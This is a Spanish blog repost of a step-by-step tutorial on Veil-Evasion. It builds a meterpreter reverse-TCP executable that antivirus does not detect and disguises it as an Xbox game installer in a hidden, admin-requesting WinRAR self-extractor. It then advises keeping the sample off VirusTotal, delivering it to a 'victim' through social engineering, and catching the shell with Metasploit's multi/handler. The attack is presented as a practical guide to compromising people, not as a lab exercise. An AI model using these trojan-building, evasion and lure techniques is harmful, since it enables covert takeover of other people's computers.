Banner 1

Bypass de Antivirus con Veil Evasion

Un buen articulo que encontré escrito por Edgar para la comunidad dragon:
_____________________________________________________________________________

Buen dia comunidad, un gusto compartir con ustedes este post en el que les hablaré de Veil-evasion,s un framework creado por Christopher Truncer para generar ejecutables que no sean detectados por los antivirus comunes, técnica normalmente conocida como bypass de antivirus, o simplemente volver in-detectable un ejecutable.
A continuación veremos como paso a paso, utilizando este framework generamos un ejecutable que nuestro antivirus analizara y no lo tomara como una amenaza.
Lo primero que debemos hacer es abrir una terminal en nuestro kali.

Bypass Antivirus016 Bypass de Antivirus con Veil Evasion
Con el comando apt-get update lo que en realidad vamos ha hacer es actualizar los repositorios, ver si hay algo nuevo, es decir actualizar la lista de todos los paquetes, con la dirección de dónde obtenerlos para que a la hora de hacer la búsqueda y su posterior descarga, sea más rápida.
Bypass Antivirus019 Bypass de Antivirus con Veil Evasion
Luego apt-get upgrade,que lo que hace es una actualización de nuestro sistema con todas las posibles actualizaciones que pudiera haber, es decir no sólo actualiza nuestro sistema operativo sino que también las aplicaciones que están contenidas en los repositorios. Este paso puede ser algo demorado dependiendo de la cantidad de aplicaciones.
Bypass Antivirus020 Bypass de Antivirus con Veil Evasion
Después de haber actualizado nuestro kali, continuamos con la instalación de nuestro framework Veil usando el comando apt-get install veil. Este paso también tarda un poco ya que se realiza una descarga de 195 Mb.
Bypass Antivirus021 Bypass de Antivirus con Veil Evasion
Después de instalar Veil, naveguamos hasta el directorio de instalación con el comando cd /usr/share/veil-evasion/setup/ estando dentro del directorio con el comando ls listamos los ficheros dentro de la ruta, podremos visualizar un script con el nombre setup.sh y lo ejecutamos el comando ./setup.sh
Bypass Antivirus022 Bypass de Antivirus con Veil Evasion
El script se ejecutara
Bypass Antivirus023 Bypass de Antivirus con Veil Evasion
Nos pide que hagamos unas instalaciones de Phyton damos clic en Next >.
Bypass Antivirus024 Bypass de Antivirus con Veil Evasion
Damos clic en Next >.
Bypass Antivirus025 Bypass de Antivirus con Veil Evasion
Remplazamos los archivos existentes dando clic en Yes.
Bypass Antivirus002 Bypass de Antivirus con Veil Evasion
Damos clic en Next >.
Bypass Antivirus026 Bypass de Antivirus con Veil Evasion
Damos clic en Finish.
Bypass Antivirus045 Bypass de Antivirus con Veil Evasion
Damos clic en Siguiente >.
Bypass Antivirus049 Bypass de Antivirus con Veil Evasion
Damos clic en Siguiente >.
Bypass Antivirus048 Bypass de Antivirus con Veil Evasion
Damos clic en Terminar.
Bypass Antivirus047 Bypass de Antivirus con Veil Evasion
Damos clic en Siguiente >.
Bypass Antivirus046 Bypass de Antivirus con Veil Evasion
Damos clic en Siguiente >.
Bypass Antivirus048 Bypass de Antivirus con Veil Evasion
Damos clic en Siguiente >.
Bypass Antivirus043 Bypass de Antivirus con Veil Evasion
Damos clic en Terminar.
Bypass Antivirus050 Bypass de Antivirus con Veil Evasion
Finalmente tenemos el framework de Veil instalado y configurado en nuestro kali con el comando clear limpiamos nuestra consola.
Bypass Antivirus017 Bypass de Antivirus con Veil Evasion
Nos devolvemos al directorio root con el comando cd /root y abrimos Veil con el comando veil-evasion
Bypass Antivirus003 Bypass de Antivirus con Veil Evasion
Esta abierto nuestro Veil con diferentes opciones
Bypass Antivirus027 Bypass de Antivirus con Veil Evasion
Con el comando list nos muestra los payloads que podemos usar
Bypass Antivirus028 Bypass de Antivirus con Veil Evasion
En la versión 2.4.3 que he instalado me aparecen un total de 24 payloads.
Bypass Antivirus051 Bypass de Antivirus con Veil Evasion
Ingresamos el número del payload a utilizar en este caso usare el número:
18) python/metertpreter/rev_tcp
Bypass Antivirus037 Bypass de Antivirus con Veil Evasion
En otra terminal con el comando ifconfig averiguamos la ip de nuestro kali para que la víctima se conecte hacia nosotros con el archivo.exe que crearemos con Veil.
Bypass Antivirus029 Bypass de Antivirus con Veil Evasion
Con el comando set LHOST 10.0.1.31 (la ip de nuestro kali o localhost) agregamos un parámetro que es obligatorio para poder crear nuestro archivo.exe
Bypass Antivirus037 Bypass de Antivirus con Veil Evasion
Con el comando generate crearemos el archivo.exe
Bypass Antivirus038 Bypass de Antivirus con Veil Evasion
Ingresa el nombre del archivo en mi caso le pondré “archivo”
Bypass Antivirus004 Bypass de Antivirus con Veil Evasion
Ingresamos el número del tipo de .exe en mi caso pondré el
1)    Pyinstaller (default)
Bypass Antivirus014 Bypass de Antivirus con Veil Evasion
Se ha creado nuestro archivo.exe y nos muestra todos los parámetros que le hemos pasado además la ruta donde se ha creado /root/veil-output/compiled/archivo.exe
Bypass Antivirus015 Bypass de Antivirus con Veil Evasion
Presionamos CTRL+C para salir de Veil y ponemos la ruta donde se encuentra nuestro archivo con el comando cd /root/veil-output/compiled/ para revisar que si se haya creado exitosamente ingresamos el comando ls para listar los archivos de esta carpeta, como podemos ver se creó satisfactoriamente
Bypass Antivirus005 Bypass de Antivirus con Veil Evasion
Daremos un toque más personalizado a nuestro archivo.exe poniéndole otro nombre y un icono más llamativo, para hacer esto llevamos nuestro archivo a un entorno Windows, usaremos winrar y un icono para pulir nuestro archivo.exe
Bypass Antivirus006 Bypass de Antivirus con Veil Evasion
Señalamos los dos archivos damos contra clic y seleccionamos Añadir al archivo
Bypass Antivirus033 Bypass de Antivirus con Veil Evasion
Le damos un nombre llamativo a nuestro archivo en mi caso es el nombre de un instalador para un juego de Xbox 360 “Install Gears Online.exe” y damos clic la opción crear archivo autoextraíble luego continuamos a la pestaña Avanzado
Bypass Antivirus039 Bypass de Antivirus con Veil Evasion
Damos clic en Autoextraíble… en algunas visiones de winrar dice FX
Bypass Antivirus040 Bypass de Antivirus con Veil Evasion
Damos la ruta de extracción de nuestros archivos y damos clic en Instalación
Bypass Antivirus007 Bypass de Antivirus con Veil Evasion
Ponemos el nombre de nuestro archivo.exe con extensión, damos clic en Modos
Bypass Antivirus008 Bypass de Antivirus con Veil Evasion
Damos clic en Ocultar todo y luego en Avanzado
Bypass Antivirus009 Bypass de Antivirus con Veil Evasion
Damos clic en Solicitar acceso como Administrador y luego damos clic en Actualizar
Bypass Antivirus010 Bypass de Antivirus con Veil Evasion
Damos clic en Omitir ficheros Existentes y luego en Texto e icono
Bypass Antivirus011 Bypass de Antivirus con Veil Evasion
Examinamos la ruta del icono llamativo
Bypass Antivirus001 Bypass de Antivirus con Veil Evasion y damos clic en Aceptar
Bypass Antivirus012 Bypass de Antivirus con Veil Evasion
Clic en Aceptar
Bypass Antivirus041 Bypass de Antivirus con Veil Evasion
Ya tenemos nuestro archivo.exe con un nuevo icono y un nuevo nombre
Bypass Antivirus034 Bypass de Antivirus con Veil Evasion
La prueba de fuego escanearlo con un antivirus y recién actualizado
Bypass Antivirus035 Bypass de Antivirus con Veil Evasion
Ha pasado la prueba el EsetNod32 actualizado, no detecto amenazas en nuestro archivo
Bypass Antivirus036 Bypass de Antivirus con Veil Evasion
Les recomiendo no subir este tipo de archivos para probarlos en páginas como VIRUS TOTAL ya que estas se encargan de enviar estos datos para que sean examinados y reportar a las casa software de antivirus y podríamos perder la funcionalidad del framework.
Bypass Antivirus018 Bypass de Antivirus con Veil Evasion
Con un poco de ingeniería social hacemos llegar este archivo a nuestra víctima ya sea por correo un amigo muy cercano o de la manera que se les pueda ocurrir, el éxito depende un poco, de cuanto sepamos de esta persona ya que si es alguien que no le gusten los videojuegos como lo es en mi caso dudo mucho que lo abra. Es decir una imagen y nombre acorde a los gustos de nuestra víctima. Volviendo a nuestro kali abrimos Metasploit-framework con el comando msfconsole esto tarda un poco
Bypass Antivirus030 Bypass de Antivirus con Veil Evasion
Utilizamos el comando use exploit/multi/handler y tomamos los parametros del localhost, del localport y el payload que utilizaremos. Damos el comando exploit para que corra el exploit
Bypass Antivirus031 Bypass de Antivirus con Veil Evasion
Asumiendo que la víctima abre el “instalador del juego” miramos en nuestro kali que esta sucediendo
Bypass Antivirus013 Bypass de Antivirus con Veil Evasion
A nuestra victima si le gustan los videojuegos GAME OVER
Bypass Antivirus032 Bypass de Antivirus con Veil Evasion

 Articulo escrito por Edgar Parra para La Comunidad DragonJAR
Fuente: http://www.dragonjar.org/bypass-de-antivirus-con-veil-evasion.xhtml

No hay comentarios:

Powered by Bad Robot
Helped by Blackubay